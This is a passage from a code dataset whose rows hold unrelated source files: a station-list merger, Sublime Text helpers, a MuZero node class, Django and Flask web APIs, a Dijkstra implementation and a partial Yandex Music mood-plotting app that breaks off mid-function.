index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
997,700 | fba7c1f888701dee6d2b4e6fa3ec05b89de3003c | #!/usr/bin/env python
############################################################################
#
# Script: create-master.py
#
# Description: Combine BB and CH station lists into one master list
#
############################################################################
import os
import sys
import array
import getopt
import math
import random
# Domain side length
DOMAINLENGTHETA = 180e3
DOMAINLENGTHCSI = 135e3
# Location tolerance
TOL = 1e-3
class CreateMaster:
    """Builds a master station list from one station file, optionally merging
    a second file while dropping duplicates and out-of-box stations.

    Input lines are whitespace-separated: net sta lon lat x y.
    The merged list is written to stdout.
    """
    def __init__(self, argv):
        # Keep the raw command line; argv[0] is the program name
        self.argc = len(argv)
        self.argv = argv
    def usage(self):
        """Prints usage text and exits the process with status 1."""
        print "Usage: " + sys.argv[0] + " <station file1> [station file2]"
        print "Example: " + sys.argv[0] + " -m BB_station_xy.list CH_station_xy.list\n"
        print "Example: " + sys.argv[0] + " BB_station_xy\n"
        print "\t[-h] : This help message"
        print "\t[-m] : Perform merge"
        print "\t<stations file1> : Station list 1"
        print "\t<stations file2> : Station list 2 (Optional, used in merge)"
        sys.exit(1)
    def main(self):
        """Parses options, reads the list(s), filters/merges, writes stdout.

        Returns 0 on success. NOTE: usage() calls sys.exit(1), so the
        return statements after self.usage() are unreachable.
        """
        # Parse options
        try:
            opts, args = getopt.getopt(self.argv[1:], "hm", ["help", "merge"])
        except getopt.GetoptError, err:
            print str(err)
            self.usage()
            return(1)
        # Defaults
        domerge = False
        for o, a in opts:
            if o in ("-h", "--help"):
                self.usage()
                return(0)
            elif o in ("-m", "--merge"):
                domerge = True
            else:
                print "Invalid option %s" % (o)
                return(1)
        # Check command-line arguments: merge needs two files, plain mode one
        if ((domerge == True and len(args) != 2) or
            (domerge == False and len(args) != 1)):
            self.usage()
            return(1)
        sfile1 = args[0]
        if (domerge):
            sfile2 = args[1]
        #print "Reading in station list %s" % (sfile1)
        fp = open(sfile1, 'r')
        sdata1 = fp.readlines()
        fp.close()
        if (domerge):
            #print "Reading in station list %s" % (sfile2)
            fp = open(sfile2, 'r')
            sdata2 = fp.readlines()
            fp.close()
        master = []
        # Preferred stations that must be included if they fit in sim box
        #print "Merging station lists:"
        for i in range(0, len(sdata1)):
            stokens = sdata1[i].split()
            snet1 = stokens[0]
            ssta1 = stokens[1]
            slon1 = float(stokens[2])
            slat1 = float(stokens[3])
            sx1 = float(stokens[4])
            sy1 = float(stokens[5])
            # Keep only stations inside the simulation box
            if ((sx1 >= 0.0) and (sx1 < DOMAINLENGTHETA) and (sy1 >= 0.0) and (sy1 < DOMAINLENGTHCSI)):
                master.append([snet1, ssta1, slon1, slat1, sx1, sy1]);
            #else:
            #    print('Station %s %s is outside of sim box (%f, %f)\n' % (snet1, ssta1, sx1, sy1));
        if (domerge):
            # Additional stations with possible duplicates that must be filtered
            master2 = []
            for i in range(0, len(sdata2)):
                stokens = sdata2[i].split()
                snet2 = stokens[0]
                ssta2 = stokens[1]
                slon2 = float(stokens[2])
                slat2 = float(stokens[3])
                sx2 = float(stokens[4])
                sy2 = float(stokens[5])
                # Find in master list: duplicate = lon AND lat within TOL
                found = False
                for m in range(0, len(master)):
                    mtokens = master[m]
                    mnet = mtokens[0]
                    msta = mtokens[1]
                    mlon = float(mtokens[2])
                    mlat = float(mtokens[3])
                    mx = float(mtokens[4])
                    my = float(mtokens[5])
                    if ((math.fabs(slon2 - mlon) < TOL) and
                        ((math.fabs(slat2 - mlat) < TOL))):
                        #sys.stdout.write("%s %s duplicate of %s %s\n" % (snet2, ssta2, mnet, msta))
                        found = True
                        break;
                # Append to new list to allow dupes in CH list
                if (not found):
                    master2.append([snet2, ssta2, slon2, slat2, sx2, sy2]);
            # Merge the two lists
            master = master + master2
        # Output merged list
        # NOTE(review): 8 fields are written below but the header names only 7;
        # the literal 0.0 looks like a depth/elevation placeholder -- confirm.
        sys.stdout.write("# net sta lon lat x y sta_id\n")
        staid = 0
        for m in range(0, len(master)):
            mtokens = master[m]
            mnet = mtokens[0]
            msta = mtokens[1]
            mlon = float(mtokens[2])
            mlat = float(mtokens[3])
            mx = float(mtokens[4])
            my = float(mtokens[5])
            stafile = "station.%d" % (staid)
            sys.stdout.write("%5s\t%10s\t%14.6f\t%14.6f\t%14.6f\t%14.6f\t%14.6f\t%12s\n" % (mnet, msta, mlon, mlat, 0.0, mx, my, stafile))
            staid = staid + 1
        #print "Done"
        return 0
if __name__ == '__main__':
    # Build the tool from the raw argv and propagate its exit status
    tool = CreateMaster(sys.argv)
    sys.exit(tool.main())
|
997,701 | b255f5b5d0ec7d184b8df76ae9b911572690f277 | '''
Helper functions for working with sublime
'''
import sublime
import sublime_plugin
def sublime_show_region(view, region):
    ''' Centers the view on region unless it is already on screen '''
    already_on_screen = view.visible_region().intersects(region)
    if not already_on_screen:
        view.show_at_center(region)
def sublime_is_multiselect(view):
    ''' True when the view currently carries more than one selection '''
    return len(view.sel()) > 1
def sublime_is_visual(view):
    ''' True when any selection spans at least one character.

    Command mode and insert mode both use empty selections (command mode
    merely draws a block cursor); only visual mode selects characters.
    '''
    for sel in view.sel():
        if not sel.empty():
            return True
    return False
class MetaWindowFactory(type):
    '''
    Factory: Singleton per window
    Meta-Using classes:
        view MUST be passed into __init__
        self.window is always assigned
    '''
    def __init__(cls, name, bases, attrs, **kwargs):
        # One instance cache per concrete class, keyed by window id
        cls._instances = {}
        super().__init__(name, bases, attrs, **kwargs)
    def __call__(cls, *args, **kwargs):
        # Accept either window= or view=; derive the window from the view.
        # Both keywords are consumed here and NOT forwarded to __init__.
        view = kwargs.pop('view', None)
        window = kwargs.pop('window', None)
        if window is None and view is not None:
            window = view.window()
        factory_id = window.id()
        self = cls._instances.get(factory_id, None)
        if self is None:
            # First request for this window: allocate, pre-assign .window so
            # __init__ can already use it, then cache the instance
            self = cls.__new__(cls, *args, **kwargs)
            self.window = window
            self.__init__(*args, **kwargs)
            cls._instances[factory_id] = self
        return self
class MetaViewFactory(type):
    '''
    Factory: Singleton per view
    Meta-Using classes:
        view MUST be passed into __init__
        self.view is always assigned
    '''
    def __init__(cls, name, bases, attrs, **kwargs):
        # One instance cache per concrete class, keyed by view id
        cls._instances = {}
        super().__init__(name, bases, attrs, **kwargs)
    def __call__(cls, *args, **kwargs):
        # 'view' is consumed here and NOT forwarded to __init__
        view = kwargs.pop('view', None)
        factory_id = view.id()
        self = cls._instances.get(factory_id, None)
        if self is None:
            # First request for this view: allocate, pre-assign .view so
            # __init__ can already use it, then cache the instance
            self = cls.__new__(cls, *args, **kwargs)
            self.view = view
            self.__init__(*args, **kwargs)
            cls._instances[factory_id] = self
        # NOTE(review): this unconditional reassignment is redundant for new
        # instances; presumably it refreshes a cached instance with the latest
        # view object for this id -- confirm before removing
        self.view = view
        return self
class Viewport():
    ''' Snapshot of a view's scroll position that can be restored later '''
    def __init__(self, view):
        self.view = view
        self.__viewport = view.viewport_position()
    def load(self):
        ''' Focuses the view and scrolls it back to the saved position '''
        window = self.view.window()
        window.focus_view(self.view)
        self.view.set_viewport_position(self.__viewport)
class QuickPanelFinder(metaclass=MetaWindowFactory):
    ''' One-shot hook that hands back the quick panel's view when it opens '''
    def __init__(self):
        ''' Starts out with no pending callback '''
        self.listener = None
    def listen(self, callback):
        ''' Registers callback to receive the view of the next quickpanel '''
        if self.listener is not None:
            raise RuntimeError("Existing Listener: Another quickpanel is also opening?")
        self.listener = callback
    def cancel(self, callback):
        ''' Unregisters callback if it is still the pending one '''
        if self.listener is callback:
            self.listener = None
    def on_open(self, view):
        ''' Event: fires the pending callback (at most once) with the view '''
        callback, self.listener = self.listener, None
        if callback:
            callback(view)
class QuickPanelListener(sublime_plugin.EventListener):
    ''' Routes focus events to the QuickPanelFinder of the owning window '''
    def on_activated(self, view):
        ''' Called whenever a view (tab, quick panel, etc.) gains focus '''
        if view is None:
            return
        if view.window() is None:
            # Windowless views are subpanels; not relevant here
            return
        QuickPanelFinder(view=view).on_open(view)
# --------------------------------------------------------------------------------------------------
def closest_visible(selection, visible_region=None, inverted=False):
    ''' Picks the first region of the selection inside the viewport.

    Falls back to the first region past the viewport edge, then to the
    very first region when nothing else qualifies, and returns None for
    an empty selection. visible_region = view.visible_region()
    '''
    if len(selection) == 0:
        # Nothing to choose from...
        return None
    fallback = selection[0]
    if visible_region is None or len(selection) == 1:
        # No viewport to compare against (or no real choice)
        return fallback
    for candidate in selection:
        if visible_region.contains(candidate):
            # Fully inside the viewport -- done
            return candidate
        # Already past the viewport: settle for this next one over
        if inverted:
            if visible_region.end() <= candidate.end():
                return candidate
        elif visible_region.begin() <= candidate.begin():
            return candidate
    # Ran off the end... loop back around
    return fallback
class CursorMatch(object):
    ''' Marks a match region as special (the one the viewport should jump to) '''
    # pylint: disable=too-few-public-methods
    def __init__(self, cursor, region, is_visible=False):
        ''' Remembers the match region, its originating cursor, and whether
        that cursor was the visible one '''
        self.orig = cursor
        self.region = region
        self.is_visible = is_visible
def cursor_to_matches(*, cursors, matches, viewport, inverted=False, find_visible_only=False):
    ''' Loops through and generates a new set of cursors to jump to.

    Yields a CursorMatch for each group of cursors, carrying the match
    region they should jump to; is_visible marks the one the viewport
    should follow. Yields nothing when there are no matches.
    '''
    matches = list(matches)
    if len(matches) == 0:
        # There is no such thing as 'next'
        return
    # We'll be messing with the list, duplicate it
    cursors = list(cursors)
    # Invert our jump
    if inverted:
        # Sublime merges adjacent regions, so they cannot overlap
        # THUS inverting it results in a sorted (backwards) list
        cursors = [cursor for cursor in cursors[::-1]]
        matches = matches[::-1]
    # Find the closest cursor to the visible regions
    if len(cursors) == 0:
        # There is no cursor to jump from?
        # Just go to a visible match
        new_visible = closest_visible(matches, viewport, inverted=inverted)
        # And theres no cursors to 'jump'... finish off
        yield CursorMatch(None, new_visible, is_visible=True)
        return
    # Find the first cursor that is visible
    visible_cursor = closest_visible(cursors, viewport, inverted=inverted)
    # If we just want the visible cursor only (aka only the new viewport focus)
    # Then pretend we only have one cursor... the closest visible one
    if find_visible_only:
        cursors = [visible_cursor]
    # Used when cursors no longer see a match after them
    # They all loop around to the first one
    loop_match = matches[0]
    # The search has Multiple Stages, this ensures we keep circling through them
    # until we're done
    limit = LoopLimit(
        'Overflowed the search, either there were too many items (over 10000), '
        'or there is an infinite loop bug'
    )
    # Two-pointer sweep: both lists are consumed from the front in order
    while len(matches) and len(cursors):
        limit.count()
        # Stage 1: Drop matches that are before ANY Cursors
        while len(matches) and (
            # Normal means we're going forwards (compare the starts)
            (not inverted and cursors[0].begin() >= matches[0].begin())
            # Inverted means we're going backwards (compare the ends)
            or (inverted and cursors[0].end() <= matches[0].end())
        ):
            limit.count()
            # Drop elements before the cursor
            matches.pop(0)
        # Stage 2: Early Abort (no Matches left!)
        if len(matches) == 0:
            # We've exhausted the search
            # Replace all remaining cursors with the looped match
            yield CursorMatch(None, loop_match, is_visible=(visible_cursor in cursors))
            return
        # Stage 3: Jump cursors that are before the next match (with that match)
        was_visible = False
        replaced_cursors = []
        while len(cursors) and (
            (not inverted and cursors[0].begin() <= matches[0].begin())
            or (inverted and cursors[0].end() >= matches[0].end())
        ):
            limit.count()
            # We found the 'visible cursor' note that down
            if cursors[0] == visible_cursor:
                was_visible = True
            # Replace cursors before the match
            replaced_cursors.append(cursors.pop(0))
        # All the cursors we just dropped go to this match
        yield CursorMatch(
            (replaced_cursors[0] if replaced_cursors else None),
            matches[0],
            is_visible=was_visible,
        )
# -------------------------------------------------------------------------------------------------
# Misc helpers
# NON SUBLIME
import itertools
class Sentinel:
    ''' Unique marker value; its repr is simply the class name '''
    def __repr__(self):
        return type(self).__name__
def pairwise(iterable, include_tail=False):
    """
    s -> (s0,s1), (s1,s2), (s2, s3), ...
    s, True -> (s0, s1) ... (sn-1, sn), (sn, None)
    """
    current, ahead = itertools.tee(iterable)
    # Advance the second branch one step so it trails by one element
    trailing = itertools.islice(ahead, 1, None)
    if include_tail:
        trailing = itertools.chain(trailing, (None,))
    return zip(current, trailing)
class LoopLimit(Exception):
    ''' Countdown guard for loops: raises itself once the budget runs out '''
    def __init__(self, message=None, limit=1000):
        self.counter = limit
        super().__init__(message)
    def count(self):
        ''' Spends one iteration of the budget; raises at zero '''
        remaining = self.counter - 1
        self.counter = remaining
        if remaining <= 0:
            raise self
|
997,702 | c8ea14bfe7c83991e05b32bd350fed1ba755cd18 | #python 3.8
from numpy.random import dirichlet
from typing import List
from MuZeroConfig import MuZeroConfig
from Action import Action
from Player import Player
class Node(object):
    """A node in MuZero's Monte-Carlo search tree."""
    def __init__(self, prior: float, to_play: Player, hidden_state = None, discount: float = 1.):
        # Number of MCTS visits through this node
        self.visit_count = 0
        # Prior probability assigned by the policy network
        self.prior = prior
        # Player to move at this node
        self.to_play = to_play
        # Accumulated backed-up value over all visits
        self.value_sum = 0
        # List of [action, child Node] pairs, filled by expand()
        self.children = []
        self.hidden_state = hidden_state
        self.discount = discount
        self.reward = 0
    def expand(self, actions: List[Action], hidden_state, policy, value):
        """Creates one child per legal action with priors normalised by the
        policy's total mass.

        NOTE(review): ``value`` is unused here -- presumably kept for
        interface compatibility; confirm with callers.
        """
        # policy is indexed as policy[0, action.index] -- assumes a
        # 1 x num_actions tensor; TODO confirm
        moves = [[action, policy[0, action.index].item()] for action in actions]
        p_sum = policy.sum().item()
        # Next player is built by negating .player -- assumes a numeric
        # (sign-flipping) side encoding; confirm against Player
        next_player = Player(-self.to_play.player)
        for action, p in moves:
            subnode = Node(p / p_sum, next_player, hidden_state)
            self.children.append([action, subnode])
    def addNoise(self, config: MuZeroConfig):
        """Mixes Dirichlet noise into the children's priors for root exploration."""
        noise = dirichlet([config.root_dirichlet_alpha] * len(self.children))
        for i in range(len(self.children)):
            self.children[i][1].prior = self.children[i][1].prior * (
                1 - config.root_exploration_fraction) + noise[i] * config.root_exploration_fraction
    def expanded(self) -> bool:
        """True once children have been generated."""
        return len(self.children) > 0
    def value(self) -> float:
        """Mean backed-up value; 0 for an unvisited node."""
        return 0 if self.visit_count == 0 else self.value_sum / self.visit_count
|
997,703 | bb4f25f230b1d8a0e2d5a524f7053d8795d61afb | given = "sausage"
back = ""
for digit in range(3):
back += given[2*digit]
print(back)
|
997,704 | 71cf2600a82b3c2c7d434a95c066cc419b263300 | from django.shortcuts import render
from django.http import JsonResponse
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import ProductSerializer
from .models import Product
import django_filters.rest_framework
from rest_framework import status
# Create your views here.
@api_view(['GET'])
def apiOverview(request):
    """Lists every endpoint exposed by this API."""
    overview = {
        'All Products List' : '/product-list/',
        'Detailed View' : '/product-details/<str:pk>/',
        'Register Product' : '/product-register/',
        'Available Products List' : '/product-list-available/',
        'Out of Stock Products List' : '/product-list-soldout/',
        'Register Product Quantity Change' : '/product-quantity-change/<str:pk>/<str:quantity>/'
    }
    return Response(overview)
@api_view(['GET'])
def productList(request):
    """Returns every product, serialized."""
    serialized = ProductSerializer(Product.objects.all(), many=True)
    return Response(serialized.data)
@api_view(['GET'])
def productDetails(request, pk):
    """Returns a single product looked up by SKU, or 404 when absent."""
    try:
        product = Product.objects.get(sku=pk)
    except Product.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    return Response(ProductSerializer(product, many=False).data)
@api_view(['GET'])
def productListAvailable(request):
    """Returns every product whose quantity is non-zero."""
    in_stock = Product.objects.all().exclude(quantity=0)
    return Response(ProductSerializer(in_stock, many=True).data)
@api_view(['GET'])
def productListSoldOut(request):
    """Returns every product whose quantity is exactly zero."""
    sold_out = Product.objects.filter(quantity=0)
    return Response(ProductSerializer(sold_out, many=True).data)
@api_view(['POST'])
def productRegister(request):
    """Creates a product from the request body.

    Returns the saved representation with 201 on success; on validation
    failure returns the serializer's error details with 400.
    """
    serializer = ProductSerializer(data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
    # Bug fix: previously returned serializer.data on failure, which hides
    # the validation problems; DRF convention is to return .errors
    return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['PATCH'])
def productQuantityChange(request, pk, quantity):
    """Adjusts a product's quantity by a signed integer delta.

    Returns the updated product; 404 when the SKU does not exist and 400
    when the resulting data fails validation.
    """
    try:
        product = Product.objects.get(sku=pk)
    except Product.DoesNotExist:
        # Bug fix: an unknown SKU previously raised an uncaught exception
        return Response(status=status.HTTP_404_NOT_FOUND)
    data = {'quantity': product.quantity + int(quantity)}
    serializer = ProductSerializer(product, data=data, partial=True)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data)
    # Bug fix: previously fell through returning None (an HTTP 500)
    return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
997,705 | 208f1f5678d54279fbd4bcfadaca290d462a49b9 | from flask import Flask
import redis
from bson import json_util
from config import *
from mongo_client import Mongo
app = Flask(__name__)
mongo_client = Mongo()
redis_client = redis.Redis.from_url(REDIS_DSN)
@app.route('/')
def healthy():
    """Liveness probe: always reports the service as up."""
    body = "OK"
    return body, 200
@app.route('/collection/<collection>/id/<document_id>')
def fetch(collection, document_id):
    """Returns a document by id, served from the cache when possible."""
    document = get_from_cache_or_mongo(collection, document_id)
    return document, 200
def get_from_cache_or_mongo(collection, document_id):
    """Fetches a document, preferring the Redis cache over MongoDB.

    On a cache miss the document is read from MongoDB and written back
    to Redis under the key 'mongodb:<collection>:<document_id>'.
    """
    cache_key = f'mongodb:{collection}:{document_id}'
    cached = get_from_cache(cache_key)
    if cached is not None:
        return cached
    document = mongo_client.find_one(collection, document_id)
    redis_client.set(cache_key, json_util.dumps(document))
    return document
def get_from_cache(key):
    """Returns the decoded cached value for key, or None on a miss."""
    raw = redis_client.get(key)
    return json_util.loads(raw) if raw is not None else None
if __name__ == '__main__':
    # Bind on all interfaces; PORT and DEBUG_MODE come from config
    app.run(host='0.0.0.0', port=PORT, debug=DEBUG_MODE)
|
997,706 | ffe6d25356bcd18bf3b1642891d82a63580f76a0 | from __future__ import annotations
import argparse
import dxtbx.util
from dxtbx.sequence_filenames import find_matching_images
def run(args=None):
    """Prints every image file matching the given template specification."""
    dxtbx.util.encode_output_as_utf8()
    parser = argparse.ArgumentParser(
        description="Find images that match a template specification"
    )
    parser.add_argument(
        "template", help="The template specification", metavar="TEMPLATE"
    )
    namespace = parser.parse_args(args)
    for image_path in find_matching_images(namespace.template):
        print(image_path)
if __name__ == "__main__":
    # Command-line entry point
    run()
|
997,707 | feeab94d6ef30b3107bf1159ce592ac304c686d0 | # Generated by Django 3.0.7 on 2020-06-18 23:13
from django.db import migrations
class Migration(migrations.Migration):
    """Renames the 'movies' model field movie_name to movie_title."""
    dependencies = [
        ('filmsnob', '0001_initial'),
    ]
    operations = [
        migrations.RenameField(
            model_name='movies',
            old_name='movie_name',
            new_name='movie_title',
        ),
    ]
|
997,708 | c5d40325fb37267244f921cc7370abd557e85b40 | def graphDistances(g, s):
g=Graph(g)
return g.dijkstra(s)
class Graph():
    """Adjacency-matrix graph supporting Dijkstra single-source shortest paths.

    graph[u][v] is the non-negative weight of edge u->v; a negative value
    means the edge is absent. Unreachable vertices keep distance 1e9.
    """
    def __init__(self, graph):
        self.V = len(graph)
        self.graph = graph
    def minDistance(self, dist, SPT):
        """Returns the unvisited vertex with the smallest tentative distance,
        or -1 when every remaining vertex is unreachable."""
        # Initilaize min distance as large int to represent ~INF
        min_ = 1e9
        # Bug fix: min_index was unbound (UnboundLocalError) when all
        # remaining vertices still had distance 1e9 (disconnected graphs)
        min_index = -1
        for v in range(self.V):
            if dist[v] != -1 and dist[v] < min_ and not SPT[v]:
                min_ = dist[v]
                min_index = v
        return min_index
    # Dijkstra's single source graph algorithm
    def dijkstra(self, sourceNode):
        """Returns the list of shortest distances from sourceNode."""
        dist = [1e9] * self.V
        dist[sourceNode] = 0
        SPT = [0] * self.V
        # loop size(V) times to find all vertices
        for _ in range(self.V):
            # find closest vertex not in the Shortest Path Tree
            u = self.minDistance(dist, SPT)
            if u == -1:
                # Remaining vertices are unreachable; stop early
                break
            # mark vertex found (vertex in SPT)
            SPT[u] = 1
            # relax edges: update any neighbour that gets closer through u
            for v in range(self.V):
                if self.graph[u][v] >= 0 and not SPT[v] and dist[v] > dist[u] + self.graph[u][v]:
                    dist[v] = dist[u] + self.graph[u][v]
        return dist
|
997,709 | 16415d1a9fd7cc52d05e7b623110a65f60cddaba | from flask import Flask, jsonify, request, render_template, session, redirect, g, flash, url_for, make_response
from flask_cors import CORS, cross_origin
import requests
import urllib
from yandex_music import Client, exceptions
from dl.models import SentimentDiscovery
import multiprocessing as mp
import numpy as np
import random
import uuid
import json
from datetime import datetime
import pandas as pd
import plotly
import plotly.graph_objects as go
import plotly.express as px
from get_songs_data import SongProcessing
import json
from json import JSONEncoder
import sys
import traceback
# OAuth application credentials for Yandex (placeholders; filled in deployment)
client_id = 'none'
client_secret = 'none'
# Shared sentiment model instance, loaded once at import time
sd_model = SentimentDiscovery()
# Canned per-day statistics used as a fallback when live analysis fails
test_data = { "anger_lyrics": [ 0.0, 0.0, 0.4400000050663948, 0.0, 0.0, 0.07000000153978665 ], "anticipation_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.009999999776482582 ], "disgust_lyrics": [ 0.0, 0.0, 0.8350000083446503, 0.0, 0.0, 0.07444444422920544 ], "fear_lyrics": [ 0.15000000596046448, 0.0, 0.07500000018626451, 0.0, 0.0, 0.0 ], "is_angry_music": [ 0.0, 0.0, 0.0, 2.0, 0.0, 1.0 ], "is_happy_music": [ 0.0, 2.0, 2.0, 3.0, 1.0, 6.0 ], "is_relaxed_music": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "is_sad_music": [ 1.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "joy_lyrics": [ 0.6899999976158142, 0.0, 0.0, 0.0, 0.0, 0.17222221692403158 ], "main_mood": [ "joy", "joy", "disgust", "joy", "joy", "joy" ], "sadness_lyrics": [ 0.009999999776482582, 0.0, 0.635000005364418, 0.0, 0.0, 0.005555555431379212 ], "surprise_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "timestamp": [ "2021-07-30", "2021-07-31", "2021-08-06", "2021-08-08", "2021-08-09", "2021-08-21" ], "trust_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]}
class NumpyEncoder(JSONEncoder):
    """JSONEncoder that understands NumPy scalars and arrays.

    Bug fix: the previous implementation converted scalars with
    obj.astype(...), which returns another NumPy scalar. NumPy integer
    scalars do not subclass int, so json re-dispatched them to default()
    forever, ending in a RecursionError. Converting with the plain
    float()/int() builtins yields native Python values.
    """
    def default(self, obj):
        if isinstance(obj, np.floating):
            # Covers float16 / float32 / float64
            return float(obj)
        elif isinstance(obj, np.integer):
            # Covers int32 / int64 (and all other widths)
            return int(obj)
        elif isinstance(obj, np.ndarray):
            return obj.tolist()
        else:
            # Let the base class raise the usual TypeError
            return JSONEncoder.default(self, obj)
def get_test_plot(data):
    """Builds the three dashboard figures from per-day mood statistics.

    data: dict of parallel lists keyed by day ('timestamp', *_lyrics scores,
    is_*_music counts) -- see the module-level test_data for the shape.
    Returns a tuple of three Plotly-JSON strings: (pie, stacked bar, line).
    """
    # NOTE(review): songs_count is computed but never used below -- confirm
    # before removing
    songs_count = sum(data['is_angry_music'])+\
                  sum(data['is_happy_music']) + \
                  sum(data['is_relaxed_music']) + \
                  sum(data['is_sad_music'])
    data_df = pd.DataFrame(data)
    # Per-day song total, then each music-mood count as a fraction of it
    data_df['day_sn'] = data_df['is_angry_music'] + data_df['is_happy_music'] + data_df['is_relaxed_music'] + data_df['is_sad_music']
    data_df['angry_music_perc'] = data_df['is_angry_music']/data_df['day_sn']
    data_df['happy_music_perc'] = data_df['is_happy_music'] / data_df['day_sn']
    data_df['relaxed_music_perc'] = data_df['is_relaxed_music'] / data_df['day_sn']
    data_df['sad_music_perc'] = data_df['is_sad_music'] / data_df['day_sn']
    # Emotion scores (Russian labels): lyrics score plus, where available,
    # a 0.25-weighted contribution from the matching music-mood fraction
    data_df['Спокойствие'] = data_df['trust_lyrics'] + 0.25*data_df['relaxed_music_perc']
    data_df['Ярость'] = data_df['anger_lyrics'] + 0.25*data_df['angry_music_perc']
    data_df['Восторг'] = data_df['anticipation_lyrics']
    data_df['Веселье'] = data_df['joy_lyrics'] + 0.25*data_df['happy_music_perc']
    data_df['Неприязнь'] = data_df['disgust_lyrics']
    data_df['Страх'] = data_df['fear_lyrics']
    data_df['Удивление'] = data_df['surprise_lyrics']
    data_df['Грусть'] = data_df['sadness_lyrics'] + 0.25*data_df['sad_music_perc']
    emts = ['Спокойствие', 'Ярость', 'Восторг', 'Веселье',
            'Неприязнь', 'Страх', 'Удивление', 'Грусть']
    def get_main_emotion(x):
        # Dominant emotion of a row: the column with the maximum score
        vls = list(x[emts])
        return emts[vls.index(max(vls))]
    data_df['main_mood'] = data_df.apply(get_main_emotion, axis=1)
    # Ordinal placement of each mood on the line chart's y-axis
    v_map = {
        'Ярость': -3,
        'Страх': -2,
        'Неприязнь': -1,
        'Грусть': 0,
        'Спокойствие': 1,
        'Удивление': 2,
        'Восторг': 3,
        'Веселье': 4
    }
    # Pie chart input: each emotion's total over the whole period
    sms = [data_df[e].sum() for e in emts]
    pie_df = pd.DataFrame({
        "Настроение": emts,
        "Величина": sms
    })
    # Long-format frames for the stacked bar (per day x emotion) and the
    # line chart (per day dominant mood)
    st_b_d = {'Дата': [], 'Настроение': [], 'Величина': []}
    l_d = {'Дата': [], 'Настроение': [], 'Величина': [], 'z':[]}
    for ts in data['timestamp']:
        k = data_df[data_df['timestamp'] == ts]['main_mood'].values[0]
        v = v_map[k]
        l_d['Дата'].append(datetime.strptime(ts, '%Y-%m-%d'))
        l_d['Настроение'].append(k)
        l_d['Величина'].append(v)
        # Constant marker size for the scatter overlay
        l_d['z'].append(5)
        for e in emts:
            st_b_d['Дата'].append(ts)
            st_b_d['Настроение'].append(e)
            st_b_d['Величина'].append(round(data_df[data_df['timestamp'] == ts][e].values[0], 2))
    bar_df = pd.DataFrame(st_b_d)
    line_df = pd.DataFrame(l_d)
    # Fixed colour per mood, shared by all three figures
    cdm = {
        'Ярость': '#FF6F76',
        'Страх': '#FFCA2D',
        'Неприязнь': '#6DCE8A',
        'Грусть': '#8D92A5',
        'Спокойствие': '#97F3FD',
        'Удивление': '#FDB5B5',
        'Восторг': '#D076FF',
        'Веселье': '#52A3FD'
    }
    # NOTE(review): color_scale is defined but not passed to any figure --
    # confirm before removing
    color_scale = [
        [0.0, '#FF6F76'],
        [0.125, '#FFCA2D'],
        [0.25, '#6DCE8A'],
        [0.375, '#8D92A5'],
        [0.625, '#97F3FD'],
        [0.75, '#FDB5B5'],
        [0.875, '#D076FF'],
        [1.0, '#52A3FD']
    ]
    pie_fig = px.pie(pie_df, values="Величина", names="Настроение",
                     template='plotly_dark',
                     color="Настроение",
                     color_discrete_map=cdm)
    pie_fig.update_traces(textinfo='none', hoverinfo='label')
    pie_fig.layout.plot_bgcolor = "#292E43"
    pie_fig.layout.paper_bgcolor = "#292E43"
    bar_fig = px.bar(bar_df, x="Дата", y="Величина",
                     template='plotly_dark',
                     color="Настроение",
                     color_discrete_map=cdm)
    bar_fig.layout.plot_bgcolor = "#292E43"
    bar_fig.layout.paper_bgcolor = "#292E43"
    bar_fig.update_yaxes(visible=False)
    bar_fig.update_layout(barnorm="percent")
    # Line chart = smooth line through the daily moods + coloured markers
    fig1 = px.line(line_df, x="Дата", y="Величина")
    fig1.update_traces(line=dict(color='#ECF8F7'))
    fig2 = px.scatter(line_df, x='Дата', y='Величина',
                      template='plotly_dark',
                      color='Настроение',
                      color_discrete_map=cdm,
                      size='z'
                      # trendline="rolling",
                      # trendline_options=dict(window=1)
                      )
    line_fig = go.Figure(data=fig1.data + fig2.data)
    line_fig.layout.plot_bgcolor = "#292E43"
    line_fig.layout.paper_bgcolor = "#292E43"
    line_fig.update_yaxes(visible=False)
    line_fig.update_layout(template='plotly_dark')
    line_fig.update_traces(line_shape='spline')
    return json.dumps(pie_fig, cls=plotly.utils.PlotlyJSONEncoder), \
           json.dumps(bar_fig, cls=plotly.utils.PlotlyJSONEncoder), \
           json.dumps(line_fig, cls=plotly.utils.PlotlyJSONEncoder)
def get_plots():
    """Placeholder; not implemented yet, always returns None."""
    return None
def create_app(app_name='YAMOOD_API'):
    """Builds and configures the Flask application with all of its routes.

    Returns the configured Flask app instance.
    """
    app = Flask(app_name)
    # NOTE(review): a fresh random secret key per process invalidates all
    # existing sessions on restart -- confirm this is intended
    app.secret_key = 'rand'+str(random.random())
    CORS(app, resources={r"/api/*": {"origins": "*"}})
    @app.route('/')
    def main_page():
        """Dashboard page: renders mood plots for the logged-in user, or the
        login page when no access token cookie is present."""
        at = request.cookies.get('access_token')
        if at:
            # Optional ?n= query parameter limits how many tracks to analyse
            if request.args.get('n'):
                num_tracks = int(request.args.get('n'))
            else:
                num_tracks = 20
            y_clnt = Client(at)
            g.user = {
                'username': y_clnt.me.account.login,
                'access_token': at
            }
            try:
                data = SongProcessing.get_user_stats(at,
                                                     num_tracks,
                                                     sd_model)
            except BaseException as e:
                # Fall back to the canned test_data and surface the error
                # details to the page via flash messages
                error = "Что-то пошло не так( Показываем тестовых рыбов"
                ex_type, ex_value, ex_traceback = sys.exc_info()
                # Extract unformatter stack traces as tuples
                trace_back = traceback.extract_tb(ex_traceback)
                # Format stacktrace
                stack_trace = list()
                for trace in trace_back:
                    stack_trace.append("File : %s , Line : %d, Func.Name : %s, Message : %s" % (
                        trace[0], trace[1], trace[2], trace[3]))
